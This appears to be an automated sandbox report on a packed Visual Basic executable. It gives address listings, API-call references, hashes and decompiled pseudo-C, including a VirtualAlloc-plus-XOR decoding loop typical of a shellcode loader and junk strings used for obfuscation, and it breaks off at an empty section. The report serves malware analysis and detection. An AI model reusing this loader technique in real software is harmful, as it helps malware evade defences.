0x00401613
0x00401619
0x0040161b
0x0040161d
0x0040161f
0x00401621
0x00401623
0x00401625
0x00401626
0x00401627
0x00401629
0x0040162b
0x0040162d
0x0040162e
0x0040162f
0x00401631
0x00401633
0x00401635
0x00401637
0x00401639
0x0040163b
0x0040163d
0x0040163f
0x00401646
0x00401647
0x00401649
0x0040164b
0x0040164e
0x00401650
0x00401652
0x00401654
0x00401656
0x00401658
0x0040165a
0x0040165c
0x0040165d
0x0040165e
0x0040165f
0x00401661
0x00401663
0x00401665
0x00401666
0x00401667
0x00401669
0x0040166b
0x0040166d
0x0040166f
0x00401671
0x00401673
0x00401675
0x00401677
0x00401679
0x0040167c
0x0040167f
0x00401681
0x00401683
0x00401685
0x00401687
0x00401689
0x0040168b
0x0040168d
0x0040168f
0x00401691
0x00401693
0x00401699
0x0040169b
0x0040169d
0x0040169e
0x0040169f
0x004016a1
0x004016a3
0x004016a5
0x004016a7
0x004016a9
0x004016ab
0x004016ad
0x004016af
0x004016b1
0x004016b4
0x004016b5
0x004016b6
0x004016b7
0x004016b9
0x004016bb
0x004016c1
0x004016c3
0x004016c5
0x004016c7
0x004016c9
0x004016ce
0x004016cf
0x004016d1
0x004016d3
0x004016d5
0x004016d6
0x004016d7
0x004016d9
0x004016dd
0x004016df
0x004016e1
0x004016e3
0x004016e5
0x004016e7
0x004016ea
0x004016eb
0x004016f1
0x004016f3
0x004016f6
0x004016f8
0x004016fa
0x004016fc
0x004016fe
0x00401700
0x00401702
0x00401704
0x00401706
0x00401707
0x00401709
0x0040170b
0x0040170d
0x0040170e
0x0040170f
0x00401711
0x00401713
0x00401715
0x00401717
0x00401719
0x0040171b
0x0040171d
0x0040171f
0x00401723
0x00401729
0x0040172b
0x0040172e
0x00401730
0x00401732
0x00401734
0x00401736
0x00401738
0x0040173a
0x0040173d
0x0040173e
0x0040173f
0x00401741
0x00401743
0x00401745
0x00401746
0x00401747
0x00401749
0x0040174b
0x0040174d
0x0040174f
0x00401751
0x00401753
0x00401755
0x00401757
0x0040175e
0x0040175f
0x00401761
0x00401763
0x00401766
0x00401768
0x0040176a
0x0040176c
0x0040176e
0x00401770
0x00401772
0x00401774
0x00401776
0x00401777
0x00401779
0x0040177c
0x0040177e
0x0040177f
0x00401781
0x00401783
0x00401785
0x00401787
0x00401789
0x0040178b
0x0040178b
0x0040178b
0x0040178d
0x0040178f
0x00401796
0x00401797
0x00401799
0x0040179b
0x0040179d
0x0040179f
0x004017a1
0x004017a3
0x004017a5
0x004017a7
0x004017a9
0x004017ab
0x004017b1
0x004017b7
0x004017b9
0x004017bb
0x004017bd
0x004017bf
0x004017c1
0x004017c3
0x004017c5
0x004017c9
0x004017cc
0x004017d1
0x004017d3
0x004017d5
0x004017d7
0x004017d9
0x004017db
0x004017dd
0x004017df
0x004017e1
0x004017e5
0x004017e6
0x004017e7
0x004017e9
0x004017eb
0x004017ed
0x004017ee
0x004017ef
0x004017f1
0x004017f3
0x004017f5
0x004017f7
0x004017f9
0x004017fb
0x004017fd
0x004017ff
0x00401803
0x00401806
0x00401807
0x00401809
0x0040180b
0x00401811
0x00401813
0x00401815
0x00401817
0x00401819
0x0040181b
0x0040181d
0x00401820
0x00401822
0x00401825
0x00401826
0x00401827
0x00401829
0x0040182b
0x0040182d
0x0040182f
0x00401831
0x00401833
0x00401835
0x00401837
0x0040183b
0x0040183e
0x0040183f
0x00401841
0x00401843
0x00401849
0x0040184b
0x0040184d
0x0040184f
0x00401851
0x00401853
0x00401856
0x00401857
0x00401859
0x0040185b
0x0040185d
0x0040185e
0x0040185f
0x00401861
0x00401863
0x00401865
0x00401867
0x00401869
0x0040186b
0x0040186d
0x0040186f
0x00401873
0x00401876
0x00401877
0x00401879
0x0040187b
0x0040187d
0x0040187f
0x00401881
0x00401883
0x00401885
0x00401887
0x00401889
0x0040188b
0x00401891
0x00401893
0x00401895
0x00401896
0x00401897
0x00401899
0x0040189d
0x0040189f
0x004018a1
0x004018a3
0x004018a5
0x004018a7
0x004018ae
0x004018af
0x004018b1
0x004018b3
0x004018b6
0x004018b8
0x004018ba
0x004018bc
0x004018be
0x004018c0
0x004018c2
0x004018c4
0x004018c8
0x004018ca
0x004018cc
0x004018ce
0x004018cf
0x004018d1
0x004018d3
0x004018d5
0x004018d7
0x004018d9
0x004018db
0x004018dd
0x004018e1
0x004018e7
0x004018e9
0x004018eb
0x004018ed
0x004018ef
0x004018f1
0x004018f3
0x004018f5
0x004018f7
0x004018f9
0x004018fb
0x004018fd
0x00401900
0x00401902
0x00401904
0x00401906
0x00401907
0x00401909
0x0040190b
0x0040190d
0x0040190f
0x00401911
0x00401913
0x00401915
0x00401917
0x0040191a
0x0040191b
0x0040191e
0x0040191f
0x00401921
0x00401923
0x00401925
0x00401927
0x00401929
0x0040192b
0x0040192d
0x0040192f
0x00401931
0x00401933
0x00401935
0x00401938
0x0040193a
0x0040193c
0x0040193e
0x0040193f
0x00401941
0x00401943
0x00401945
0x00401947
0x00401949
0x0040194b
0x0040194d
0x0040194f
0x00401952
0x00401953
0x00401956
0x00401957
0x00401959
0x0040195b
0x00401961
0x00401963
0x00401965
0x00401967
0x00401969
0x0040196b
0x0040196e
0x0040196f
0x00401971
0x00401977
0x00401979
0x0040197b
0x0040197d
0x0040197f
0x00401981
0x00401983
0x00401985
0x00401987
0x0040198b
0x0040198e
0x0040198f
0x00401991
0x00401993
0x00401995
0x00401997
0x00401999
0x0040199b
0x0040199d
0x0040199f
0x004019a1
0x004019a3
0x004019a9
0x004019ab
0x004019ad
0x004019ae
0x004019af
0x004019b1
0x004019b3
0x004019b5
0x004019b7
0x004019b9
0x004019bb
0x004019bd
0x004019bf
0x004019c6
0x004019c7
0x004019c9
0x004019cb
0x004019cd
0x004019cf
0x004019d1
0x004019d3
0x004019d5
0x004019d7
0x004019d9
0x004019db
0x004019dd
0x004019e0
0x004019e2
0x004019e3
0x004019e5
0x004019e6
0x004019e7
0x004019e9
0x004019eb
0x004019ed
0x004019ef
0x004019f1
0x004019f3
0x004019f5
0x004019f9
0x004019fc
0x004019ff
0x00401a01
0x00401a03
0x00401a06
0x00401a08
0x00401a0a
0x00401a0c
0x00401a0e
0x00401a10
0x00401a12
0x00401a14
0x00401a16
0x00401a17
0x00401a19
0x00401a1b
0x00401a1d
0x00401a1e
0x00401a1f
0x00401a21
0x00401a23
0x00401a25
0x00401a27
0x00401a29
0x00401a2b
0x00401a2d
0x00401a34
0x00401a36
0x00401a37
0x00401a39
0x00401a3b
0x00401a3e
0x00401a40
0x00401a42
0x00401a44
0x00401a46
0x00401a48
0x00401a4a
0x00401a4d
0x00401a50
0x00401a52
0x00401a54
0x00401a56
0x00401a57
0x00401a59
0x00401a5b
0x00401a5d
0x00401a5f
0x00401a61
0x00401a63
0x00401a65
0x00401a67
0x00401a6a
0x00401a6b
0x00401a71
0x00401a73
0x00401a76
0x00401a78
0x00401a7a
0x00401a7c
0x00401a7e
0x00401a80
0x00401a82
0x00401a84
0x00401a86
0x00401a87
0x00401a89
0x00401a8f
0x00401a91
0x00401a95
0x00401a97
0x00401a99
0x00401a9b
0x00401a9d
0x00401a9f
0x00401aa3
0x00401aa6
0x00401aa7
0x00401aa9
0x00401aab
0x00401aad
0x00401aae
0x00401aaf
0x00401ab1
0x00401ab3
0x00401ab5
0x00401ab7
0x00401ab9
0x00401abb
0x00401abd
0x00401ac0
0x00401ac2
0x00401ac4
0x00401ac6
0x00401ac7
0x00401ac9
0x00401acb
0x00401acd
0x00401acf
0x00401ad1
0x00401ad3
0x00401ad5
0x00401ad7
0x00401ade
0x00401adf
0x00401ae1
0x00401ae3
0x00401ae5
0x00401ae7
0x00401ae9
0x00401aeb
0x00401aed
0x00401aef
0x00401af1
0x00401af3
0x00401af5
0x00401af8
0x00401afa
0x00401afc
0x00401afe
0x00401aff
0x00401b01
0x00401b03
0x00401b05
0x00401b07
0x00401b09
0x00401b0b
0x00401b0d
0x00401b11
0x00401b16
0x00401b17
0x00401b19
0x00401b1b
0x00401b21
0x00401b23
0x00401b25
0x00401b27
0x00401b29
0x00401b2b
0x00401b2d
0x00401b30
0x00401b32
0x00401b34
0x00401b36
0x00401b37
0x00401b39
0x00401b3b
0x00401b3d
0x00401b3f
0x00401b41
0x00401b43
0x00401b45
0x00401b47
0x00401b4a
0x00401b4b
0x00401b4e
0x00401b4f
0x00401b51
0x00401b53
0x00401b56
0x00401b57
0x00401b59
0x00401b5b
0x00401b5d
0x00401b5f
0x00401b61
0x00401b63
0x00401b66
0x00401b67
0x00401b69
0x00401b6b
0x00401b6d
0x00401b6e
0x00401b6f
0x00401b71
0x00401b73
0x00401b75
0x00401b77
0x00401b79
0x00401b7b
0x00401b7d
0x00401b7f
0x00401b86
0x00401b87
0x00401b89
0x00401b8b
0x00401b8d
0x00401b8e
0x00401b8f
0x00401b91
0x00401b93
0x00401b95
0x00401b97
0x00401b99
0x00401b9b
0x00401ba1
0x00401ba3
0x00401ba5
0x00401ba6
0x00401ba7
0x00401ba9
0x00401bab
0x00401bad
0x00401baf
0x00401bb1
0x00401bb3
0x00401bb5
0x00401bb7
0x00401bbb
0x00401bbf
0x00401bc1
0x00401bc3
0x00401bc9
0x00401bcb
0x00401bcd
0x00401bcf
0x00401bd1
0x00401bd3
0x00401bd5
0x00401bd8
0x00401bda
0x00401bdc
0x00401bde
0x00401bdf
0x00401be1
0x00401be3
0x00401be5
0x00401be7
0x00401be9
0x00401beb
0x00401bed
0x00401bef
0x00401bf3
0x00401bf6
0x00401bf7
0x00401bf9
0x00401bfb
0x00401bfe
0x00401bff
0x00401c01
0x00401c03
0x00401c05
0x00401c07
0x00401c09
0x00401c0b
0x00401c0d
0x00401c0f
0x00401c11
0x00401c13
0x00401c15
0x00401c16
0x00401c17
0x00401c19
0x00401c1b
0x00401c1d
0x00401c1f
0x00401c21
0x00401c23
0x00401c25
0x00401c27
0x00401c2e
0x00401c2f
0x00401c31
0x00401c33
0x00401c35
0x00401c36
0x00401c37
0x00401c39
0x00401c3b
0x00401c3d
0x00401c3f
0x00401c41
0x00401c43
0x00401c46
0x00401c47
0x00401c49
0x00401c4c
0x00401c4e
0x00401c4f
0x00401c51
0x00401c53
0x00401c55
0x00401c57
0x00401c59
0x00401c5b
0x00401c5d
0x00401c5f
0x00401c62
0x00401c63
0x00401c66
0x00401c67
0x00401c69
0x00401c6b
0x00401c71
0x00401c73
0x00401c75
0x00401c77
0x00401c79
0x00401c7b
0x00401c81
0x00401c83
0x00401c85
0x00401c86
0x00401c87
0x00401c89
0x00401c8b
0x00401c8d
0x00401c8f
0x00401c91
0x00401c93
0x00401c95
0x00401c97
0x00401c99
0x00401c9a
0x00401c9b
0x00401c9e
0x00401c9f
0x00401ca1
0x00401ca3
0x00401ca9
0x00401cab
0x00401cad
0x00401caf
0x00401cb1
0x00401cb3
0x00401cb9
0x00401cbb
0x00401cbd
0x00401cbf
0x00401cc1
0x00401cc3
0x00401cc5
0x00401cc7
0x00401cc9
0x00401ccb
0x00401ccd
0x00401ccf
0x00401cd1
0x00401cd3
0x00401cd5
0x00401cd7
0x00401cd9
0x00401cdb
0x00401cdd
0x00401cdf
0x00401ce1
0x00401ce3
0x00401cea
0x00401cf0
0x00401cf1
0x00401cf3
0x00401cf6
0x00401cf7
0x00401cf9
0x00401cfb
0x00401d00
0x00401d01
0x00401d03
0x00401d0a
0x00401d0c
0x00401d10
0x00401d11
0x00401d13
0x00401d18
0x00401d19
0x00401d1b
0x00401d22
0x00401d24
0x00401d26
0x00401d27
0x00401d29
0x00401d2d
0x00401d2e
0x00401d2f
0x00401d31
0x00401d33
0x00401d37
0x00401d39
0x00401d3b
0x00401d3f
0x00401d41
0x00401d45
0x00401d48
0x00401d49
0x00401d4b
0x00401d52
0x00401d55
0x00401d58
0x00401d59
0x00401d5d
0x00401d60
0x00401d61
0x00401d63
0x00401d69
0x00401d6b
0x00401d6f
0x00401d72
0x00401d7e
0x00401d83

APIs

#100.MSVBVM60(VB5!6&*), ref: 004012F5

Strings

VB5!6&*, xrefs: 004012F0, 00401474

Memory Dump Source

Source File: 00000000.00000002.822108895.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.822099643.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.822132596.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.822145627.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 3cc4ef3bf8a0f69b0e79a18f546a86f11ba8a5c00a3b0f503529da420d9c1cab
Instruction ID: 5405d3c46cc998eb8c783a73b9d611c6df1db31b0c3c957b0599d1a5c3b21eac
Opcode Fuzzy Hash: 3cc4ef3bf8a0f69b0e79a18f546a86f11ba8a5c00a3b0f503529da420d9c1cab
Instruction Fuzzy Hash: F161896248E7D44FD3078B709CA66A27F74EE1331931A42DBC4C19E0B3E119295AC7A3

Uniqueness

Uniqueness Score: -1.00%

Function 00403FB2, Relevance: 1.4, APIs: 1, Instructions: 113
memoryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00403FB2() {
				void* _t9;
				signed char _t23;
				intOrPtr _t31;
				signed char _t33;
				signed int _t34;

				_t31 =  *((intOrPtr*)(_t9 + 0x10cc));
				_t23 = VirtualAlloc(0, 0x13000, 0x37d503b0, 0xc6f1c5da); // executed
				_t33 = 0xe7b8;
				do {
					asm("cli");
					asm("stc");
					_t2 = _t23 & 0x810e1433;
					_t23 = _t33;
					_t34 = _t2;
					 *_t23 =  *_t23 + _t23;
					 *((intOrPtr*)(_t31 + 0x14096bf9)) =  *((intOrPtr*)(_t31 + 0x14096bf9)) + _t23;
					 *(_t31 - 0x47ec207) =  *(_t31 - 0x47ec207) | _t23;
					asm("loop 0x2");
					 *_t23 =  *_t23 + _t23;
					 *(_t23 + _t34) =  *(_t23 + _t34) ^ 0xb38d7ec1;
					_t33 = _t34 - 0x242 + 0x23e;
				} while (_t33 >= 0);
				goto __eax;
			}

0x0040400e
0x00404100
0x00404116
0x00404126
0x0040413b
0x00404141
0x00404142
0x00404142
0x00404142
0x00404143
0x00404145
0x0040414b
0x00404151
0x00404153
0x00404155
0x00404183
0x00404183
0x00404192

APIs

VirtualAlloc.KERNELBASE(00000000,00013000,-EB6774BF,-0000000249B5C475,004017A1), ref: 00404100

Memory Dump Source

Source File: 00000000.00000002.822108895.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.822099643.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.822132596.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.822145627.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 23cd71ba70c5b1f7a74ec31350f8fde2ec1b640e677b4cf88f820acd8baf0dda
Instruction ID: 2d2792c08dd4d6d30b9677f5a71b0cff9a83b5d634dc6181e75e6e532237cb57
Opcode Fuzzy Hash: 23cd71ba70c5b1f7a74ec31350f8fde2ec1b640e677b4cf88f820acd8baf0dda
Instruction Fuzzy Hash: CE319A506513424AFF381474CBF4B2E2482DB96384F70DE3FD682EAECACA2E81C14253

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00413F17, Relevance: 65.0, APIs: 30, Strings: 7, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00413F17(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v96;
				char* _v104;
				char _v112;
				char _v120;
				char _v124;
				char* _t67;
				char* _t68;
				signed int _t73;
				char* _t75;
				char* _t81;
				char* _t82;
				char* _t83;
				char* _t88;
				void* _t90;
				char* _t93;
				void* _t94;
				char _t97;
				intOrPtr* _t115;
				intOrPtr* _t122;
				void* _t124;
				intOrPtr _t126;
				intOrPtr _t127;
				void* _t132;
				void* _t142;

				_t142 = __fp0;
				 *[fs:0x0] = _t126;
				_t127 = _t126 - 0x78;
				_v12 = _t127;
				_v8 = 0x401160;
				_t97 = 0;
				_v68 = 0x1c28;
				_v68 = 0x403ed8;
				_v68( &_v56, __esi, 0, 7, __edi, __esi, __ebx,  *[fs:0x0], 0x401176, __ecx, __ecx, _t124);
				_v96 = 0;
				_v112 = 0;
				_v120 = 0;
				_v124 = 0;
				E004032C8();
				_v120 = 0;
				L0040123C();
				if(_v120 == 0x33064c) {
					_push(0);
					_push(L"Ichthyosaurian");
					_push( &_v96);
					L0040121E();
					_t127 = _t127 - 0x10;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v60);
					asm("movsd");
					L00401224();
					L0040124E();
				}
				_v124 = 0x4c8498;
				_push( &_v124);
				_t67 =  &_v120;
				_push(_t67);
				_push(0x38e45c);
				_v120 = 0x4f4735;
				E00403310();
				L0040123C();
				if(_t67 != 0x36aeb1) {
					_t115 = _a4;
				} else {
					_t132 =  *0x4161a8 - _t97; // 0x2b7e99c
					if(_t132 == 0) {
						_push(0x4161a8);
						_push(0x403528);
						L00401248();
					}
					_t115 = _a4;
					_t122 =  *0x4161a8; // 0x2b7e99c
					_t93 =  &_v80;
					L00401218();
					_t94 =  *((intOrPtr*)( *_t122 + 0x10))(_t122, _t93, _t93, _t115);
					_t97 = 0;
					asm("fclex");
					if(_t94 < 0) {
						_push(0x10);
						_push(0x403518);
						_push(_t122);
						_push(_t94);
						L00401260();
					}
					L00401242();
				}
				_t68 =  &_v72;
				_push(L"actinologue");
				_push(_t68);
				L00401212();
				_push(_t68);
				_push(0x768003);
				E00403368();
				L0040123C();
				L00401266();
				asm("sbb eax, eax");
				_t73 =  ~( ~(_t68 - 0x23ca2d) + 1);
				if(_t73 != 0) {
					_t73 =  *((intOrPtr*)( *_t115 + 0x15c))(_t115, 0x6975);
					asm("fclex");
					if(_t73 < _t97) {
						_push(0x15c);
						_push(0x4030f0);
						_push(_t115);
						_push(_t73);
						L00401260();
					}
				}
				L0040126C();
				_push(_t73);
				_push( &_v76);
				L00401212();
				_t75 =  &_v76;
				_push(_t75);
				_push(0x17b19c);
				_push(0x6a35ad);
				E004033AC();
				_v120 = _t75;
				L0040123C();
				_push( &_v76);
				_push( &_v72);
				_push(2);
				L0040120C();
				if( ~(0 | _v120 == 0x00452982) != _t97) {
					_v104 = L"Ossifiers1";
					_v112 = 8;
					L00401284();
					_push(2);
					_push( &_v96);
					L00401236();
					st0 = _t142;
					L0040124E();
				}
				_t81 =  &_v56;
				_push(0x5d2c9b);
				_push(_t81);
				_push(0x4ee518);
				E00403400();
				_v120 = _t81;
				L0040123C();
				if(_v120 == 0x2c064e) {
					_t90 =  *((intOrPtr*)( *_t115 + 0x254))(_t115, 0x74b9);
					asm("fclex");
					if(_t90 < _t97) {
						_push(0x254);
						_push(0x4030f0);
						_push(_t115);
						_push(_t90);
						L00401260();
					}
				}
				_t82 =  &_v76;
				_push(L"Snackbaren");
				_push(_t82);
				L00401212();
				_push(_t82);
				_push(0x1a1689);
				_t83 =  &_v72;
				_push(L"AZEOTROPY");
				_push(_t83);
				L00401212();
				_push(_t83);
				E0040346C();
				_v120 = _t83;
				L0040123C();
				_push( &_v76);
				_t88 =  &_v72;
				_push(_t88);
				_push(2);
				L0040120C();
				if( ~(0 | _v120 == 0x00205b99) != _t97) {
					_v104 = 0x403618;
					_v112 = 8;
					L00401284();
					_t88 =  &_v96;
					_push(_t88);
					L00401206();
					L0040124E();
				}
				asm("wait");
				_push(0x414215);
				L00401242();
				return _t88;
			}

0x00413f17
0x00413f28
0x00413f2f
0x00413f35
0x00413f38
0x00413f47
0x00413f49
0x00413f50
0x00413f5b
0x00413f5e
0x00413f61
0x00413f64
0x00413f67
0x00413f6a
0x00413f6f
0x00413f72
0x00413f7e
0x00413f80
0x00413f84
0x00413f89
0x00413f8a
0x00413f8f
0x00413f97
0x00413f98
0x00413f99
0x00413f9a
0x00413f9b
0x00413f9e
0x00413f9f
0x00413fa7
0x00413fa7
0x00413faf
0x00413fb6
0x00413fb7
0x00413fba
0x00413fbb
0x00413fc0
0x00413fc7
0x00413fce
0x00413fd9
0x0041402c
0x00413fdb
0x00413fdb
0x00413fe1
0x00413fe3
0x00413fe8
0x00413fed
0x00413fed
0x00413ff2
0x00413ff5
0x00413ffb
0x00414002
0x00414009
0x0041400c
0x00414010
0x00414012
0x00414014
0x00414016
0x0041401b
0x0041401c
0x0041401d
0x0041401d
0x00414025
0x00414025
0x0041402f
0x00414032
0x00414037
0x00414038
0x0041403d
0x0041403e
0x00414043
0x0041404a
0x00414052
0x00414061
0x00414064
0x00414069
0x00414073
0x0041407b
0x0041407d
0x0041407f
0x00414084
0x00414089
0x0041408a
0x0041408b
0x0041408b
0x0041407d
0x00414098
0x0041409d
0x004140a1
0x004140a2
0x004140a7
0x004140aa
0x004140ab
0x004140b0
0x004140b5
0x004140ba
0x004140bd
0x004140d5
0x004140d9
0x004140da
0x004140dc
0x004140e7
0x004140ef
0x004140f6
0x004140fd
0x00414105
0x00414107
0x00414108
0x00414110
0x00414112
0x00414112
0x00414117
0x0041411a
0x0041411f
0x00414120
0x00414125
0x0041412a
0x0041412d
0x00414139
0x00414143
0x0041414b
0x0041414d
0x0041414f
0x00414154
0x00414159
0x0041415a
0x0041415b
0x0041415b
0x0041414d
0x00414160
0x00414163
0x00414168
0x00414169
0x0041416e
0x0041416f
0x00414174
0x00414177
0x0041417c
0x0041417d
0x00414182
0x00414183
0x00414188
0x0041418b
0x004141a3
0x004141a4
0x004141a7
0x004141a8
0x004141aa
0x004141b5
0x004141bd
0x004141c4
0x004141cb
0x004141d0
0x004141d3
0x004141d4
0x004141dc
0x004141dc
0x004141e1
0x004141e2
0x0041420f
0x00414214

APIs

__vbaSetSystemError.MSVBVM60(?,00000000), ref: 00413F72
#716.MSVBVM60(?,Ichthyosaurian,00000000,?,00000000), ref: 00413F8A
__vbaLateIdSt.MSVBVM60(?,00000000,00000000), ref: 00413F9F
__vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 00413FA7
__vbaSetSystemError.MSVBVM60(0038E45C,0033064C,?,?,00000000), ref: 00413FCE
__vbaNew2.MSVBVM60(00403528,004161A8,0038E45C,0033064C,?,?,00000000), ref: 00413FED
__vbaObjSetAddref.MSVBVM60(?,?,0038E45C,0033064C,?,?,00000000), ref: 00414002
__vbaHresultCheckObj.MSVBVM60(00000000,02B7E99C,00403518,00000010,?,00000000), ref: 0041401D
__vbaFreeObj.MSVBVM60(?,00000000), ref: 00414025
__vbaStrToAnsi.MSVBVM60(?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 00414038
__vbaSetSystemError.MSVBVM60(00768003,00000000,?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 0041404A
__vbaFreeStr.MSVBVM60(00768003,00000000,?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 00414052
__vbaHresultCheckObj.MSVBVM60(00000000,?,004030F0,0000015C,?,00000000), ref: 0041408B
__vbaStrCopy.MSVBVM60(00768003,00000000,?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 00414098
__vbaStrToAnsi.MSVBVM60(?,00000000,00768003,00000000,?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 004140A2
__vbaSetSystemError.MSVBVM60(006A35AD,0017B19C,?,?,00000000,00768003,00000000,?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 004140BD
__vbaFreeStrList.MSVBVM60(00000002,?,?,006A35AD,0017B19C,?,?,00000000,00768003,00000000,?,actinologue,0038E45C,0033064C,?), ref: 004140DC
__vbaVarDup.MSVBVM60 ref: 004140FD
#600.MSVBVM60(?,00000002), ref: 00414108
__vbaFreeVar.MSVBVM60(?,00000002), ref: 00414112
__vbaSetSystemError.MSVBVM60(004EE518,?,005D2C9B), ref: 0041412D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004030F0,00000254), ref: 0041415B
__vbaStrToAnsi.MSVBVM60(?,Snackbaren,004EE518,?,005D2C9B), ref: 00414169
__vbaStrToAnsi.MSVBVM60(?,AZEOTROPY,001A1689,00000000,?,Snackbaren,004EE518,?,005D2C9B), ref: 0041417D
__vbaSetSystemError.MSVBVM60(00000000,?,AZEOTROPY,001A1689,00000000,?,Snackbaren,004EE518,?,005D2C9B), ref: 0041418B
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,AZEOTROPY,001A1689,00000000,?,Snackbaren,004EE518,?,005D2C9B), ref: 004141AA
__vbaVarDup.MSVBVM60(004EE518,?,005D2C9B), ref: 004141CB
#529.MSVBVM60(?,004EE518,?,005D2C9B), ref: 004141D4
__vbaFreeVar.MSVBVM60(?,004EE518,?,005D2C9B), ref: 004141DC
__vbaFreeObj.MSVBVM60(00414215,004EE518,?,005D2C9B), ref: 0041420F

Strings

Snackbaren, xrefs: 00414163
Ossifiers1, xrefs: 004140EF
5GO, xrefs: 00413FB7
actinologue, xrefs: 00414032
Ichthyosaurian, xrefs: 00413F84
AZEOTROPY, xrefs: 00414177
SUPERIMPENDING, xrefs: 00414090

Memory Dump Source

Source File: 00000000.00000002.822108895.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.822099643.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.822132596.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.822145627.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ErrorSystem$Ansi$CheckHresult$List$#529#600#716AddrefCopyLateNew2
String ID: 5GO$AZEOTROPY$Ichthyosaurian$Ossifiers1$SUPERIMPENDING$Snackbaren$actinologue
API String ID: 601719216-3463406768
Opcode ID: bd5bb484a361f5fce9e8656fab918af596412996001e1a44985e36f842718e50
Instruction ID: b2fbc376a98ab6aa4a9358cda94db08eda1c117d5ee5225f2e7c57d72d5cf888
Opcode Fuzzy Hash: bd5bb484a361f5fce9e8656fab918af596412996001e1a44985e36f842718e50
Instruction Fuzzy Hash: 3F714FB1D40208AACB10EFE2C846ADEBBBCAF54705F60457FB504F71D2DB785A498B58

Uniqueness

Uniqueness Score: -1.00%

Function 00413D2A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00413D2A(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				signed int _v28;
				void* _t13;
				signed int _t14;
				void* _t15;
				intOrPtr* _t23;
				signed int _t24;
				intOrPtr _t27;

				_push(0x401176);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t27;
				_v12 = _t27 - 0x1c;
				_v8 = 0x401130;
				_v28 = _v28 & 0x00000000;
				if( *0x4161a8 == 0) {
					_push(0x4161a8);
					_push(0x403528);
					L00401248();
				}
				_t23 =  *0x4161a8; // 0x2b7e99c
				_t13 =  *((intOrPtr*)( *_t23 + 0x14))(_t23,  &_v28);
				asm("fclex");
				if(_t13 < 0) {
					_push(0x14);
					_push(0x403518);
					_push(_t23);
					_push(_t13);
					L00401260();
				}
				_t14 = _v28;
				_t24 = _t14;
				_t15 =  *((intOrPtr*)( *_t14 + 0x138))(_t14, L"KOMPROMITTERINGERNES", 1);
				asm("fclex");
				if(_t15 < 0) {
					_push(0x138);
					_push(0x403538);
					_push(_t24);
					_push(_t15);
					L00401260();
				}
				L00401242();
				_v24 = 0x150b;
				_push(0x413dde);
				return _t15;
			}

0x00413d2f
0x00413d3a
0x00413d3b
0x00413d48
0x00413d4b
0x00413d52
0x00413d5d
0x00413d5f
0x00413d64
0x00413d69
0x00413d69
0x00413d6e
0x00413d7b
0x00413d80
0x00413d82
0x00413d84
0x00413d86
0x00413d8b
0x00413d8c
0x00413d8d
0x00413d8d
0x00413d92
0x00413d9f
0x00413da1
0x00413da9
0x00413dab
0x00413dad
0x00413db2
0x00413db7
0x00413db8
0x00413db9
0x00413db9
0x00413dc1
0x00413dc6
0x00413dcd
0x00000000

APIs

__vbaNew2.MSVBVM60(00403528,004161A8), ref: 00413D69
__vbaHresultCheckObj.MSVBVM60(00000000,02B7E99C,00403518,00000014), ref: 00413D8D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403538,00000138), ref: 00413DB9
__vbaFreeObj.MSVBVM60(00000000,00000000,00403538,00000138), ref: 00413DC1

Strings

KOMPROMITTERINGERNES, xrefs: 00413D97

Memory Dump Source

Source File: 00000000.00000002.822108895.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.822099643.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.822132596.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.822145627.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2
String ID: KOMPROMITTERINGERNES
API String ID: 4261391273-264330282
Opcode ID: 62b53530d3a8b8c182b412649c8e198ba69301ac2963743444ef00739bd32ab0
Instruction ID: 71f0807d550452ad2e7677b09eef6c6ee10381cfeec245b89b9ba69aeb1273e9
Opcode Fuzzy Hash: 62b53530d3a8b8c182b412649c8e198ba69301ac2963743444ef00739bd32ab0
Instruction Fuzzy Hash: 58118270640304BFDB109FA5CD4AFDB7AACEB15B06F10416EB104B71E2C6BC5A4486A8

Uniqueness

Uniqueness Score: -1.00%

Function 00413DFB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

